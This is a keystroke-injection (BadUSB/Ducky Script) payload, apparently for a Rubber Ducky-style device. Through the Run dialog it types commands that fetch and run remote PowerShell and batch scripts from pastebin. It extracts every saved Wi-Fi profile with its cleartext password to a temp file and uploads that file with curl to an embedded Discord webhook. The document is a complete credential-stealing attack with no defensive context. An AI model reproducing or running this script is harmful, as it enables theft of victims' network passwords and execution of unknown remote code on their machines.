GUI R

DELAY 350
STRING cmd
DELAY 300

ENTER
DELAY 550
STRING SET w=https://discord.com/api/webhooks/1063949566031958068/vadCokbT1wlyfJz6DKJaVJA0Z7WZROQIatWhBKq1lqXMtmGph0l8_DBakShjdjypgtV8
DELAY 50
ENTER

DELAY 500
STRING echo $WebResponse = Invoke-WebRequest "https://pastebin.com/raw/tDxzPkTH" >script.ps1 && echo $string = $WebResponse.Content >script.ps1 >>script.ps1 && echo $code = $string.replace('312312webhook69-url321312','%w%') >>script.ps1 && echo $code ^| Out-File wfsec_haxor1337.ps1 >>script.ps1 && echo $WebResponse = Invoke-WebRequest "https://pastebin.com/raw/XpsdKYUX" >>script.ps1 && echo $script = $WebResponse.Content >>script.ps1 >>script.ps1 && echo $codescript = $script.replace('312ewb-hook-url-here321','%w%') >>script.ps1 && echo $codescript ^| Out-File -Encoding UTF8 xcvdwa.bat >>script.ps1
ENTER
DELAY 500

STRING Powershell.exe -executionpolicy remotesigned -File script.ps1
ENTER
DELAY 2000

STRING Powershell.exe -executionpolicy remotesigned -File wfsec_haxor1337.ps1
ENTER
DELAY 2000

STRING exit
ENTER
DELAY 500

GUI R
DELAY 250
STRING powershell
DELAY 100
ENTER

DELAY 500
STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-File $env:TEMP\wifi.txt
ENTER

DELAY 500
STRING exit
ENTER

DELAY 500
GUI R
DELAY 300
STRING cmd
DELAY 200
ENTER
DELAY 500

STRING xcvdwa
DELAY 100
ENTER
DELAY 5500

STRING curl -X POST -H "Content-Type: multipart/form-data" -F "file1=@%temp%/wifi.txt" https://discord.com/api/webhooks/1063949566031958068/vadCokbT1wlyfJz6DKJaVJA0Z7WZROQIatWhBKq1lqXMtmGph0l8_DBakShjdjypgtV8
ENTER
DELAY 1000

